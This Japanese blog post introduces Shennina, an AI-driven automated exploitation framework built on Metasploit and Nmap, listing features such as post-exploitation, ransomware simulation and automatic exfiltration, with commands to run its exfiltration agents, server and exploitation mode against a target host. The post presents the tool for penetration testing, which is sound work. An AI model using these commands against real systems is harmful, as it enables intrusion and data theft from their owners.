banner
andrewji8

Being towards death

Heed not to the tree-rustling and leaf-lashing rain, Why not stroll along, whistle and sing under its rein. Lighter and better suited than horses are straw sandals and a bamboo staff, Who's afraid? A palm-leaf plaited cape provides enough to misty weather in life sustain. A thorny spring breeze sobers up the spirit, I feel a slight chill, The setting sun over the mountain offers greetings still. Looking back over the bleak passage survived, The return in time Shall not be affected by windswept rain or shine.
telegram
twitter
github

自動化ホスト侵入ツール

画像
Shennina は、強力な自動化ホスト侵入 / 脆弱性利用フレームワークです。このプロジェクトの主な目的は、人工知能技術を使用してセキュリティスキャン、脆弱性スキャン / 分析、および脆弱性利用開発を完全自動化することです。Shennina は、Metasploit と Nmap という 2 つの強力なネットワークセキュリティツールの一部機能を統合し、侵入テストを実行します。さらに、このツールには、ターゲットホストからデータを自動フィルタリングするためのコマンド制御サーバーも統合されています。

機能紹介

  1. 脆弱性利用シナリオを見つけるための自動学習メソッドの実装
  2. ホスティングされた並行設計を使用した高性能実行
  3. スマートクラスターペネトレーションテスト / 脆弱性利用
  4. ポストエクスプロイト機能
  5. ディセプション攻撃の検出
  6. ランサムウェアシミュレーション機能
  7. 自動データフィルタリング
  8. オプションの脆弱性スキャンモード
  9. ヒューリスティックモードでの推奨ペネトレーションテストシナリオの取得
  10. Windows、Linux、および macOS プロキシのサポート
  11. ポストエクスプロイトフェーズのスクリプト化された攻撃 / ペネトレーションモード
  12. カーネルに対する脆弱性利用 / ペネトレーションソリューションの提案
  13. 脆弱性利用シナリオに対するサイドチャネル技術のテスト
  14. ターゲットサーバー内の重要なデータの自動フィルタリング
  15. レポートの生成
  16. MITRE ATT&CK フレームワークの 40 以上の TTP をカバー
  17. 複数の入力ターゲットのサポート

ツールのダウンロード#

このツールは Python で開発されているため、まずローカルデバイスに Python 環境をインストールして設定する必要があります。次に、次のコマンドを使用してこのプロジェクトのソースコードをローカルにクローンします:

git clone https://github.com/mazen160/shennina.git

その後、pip コマンドとプロジェクトが提供する requirements.txt ファイルを使用して、ツールに必要な依存関係のコンポーネントをインストールします:

cd Shennina
pip install requirements.txt

また、このプロジェクトのリリースページにアクセスして、ツールの最新リリースバージョンをダウンロードすることもできます。

ツールの実行#

エクスフィルトレーションサーバー - エージェント
Linux/macOS

./exfiltration-server/agent.sh

Windows

./exfiltration-server/agent.ps1

エクスフィルトレーションサーバー - 実行

$ cd ./exfiltration-server/
$ ./run-server.sh

MSFRPCD サーバー

./scripts/run-msfrp.py

サービススキャンの実行

$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only

トレーニングモードで Shennina を実行

$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local

ペネトレーションテストモード

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode

ペネトレーションテストモード - ヒューリスティック

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode

プロジェクトのリンク

Shennina:https://github.com/mazen160/shennina

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。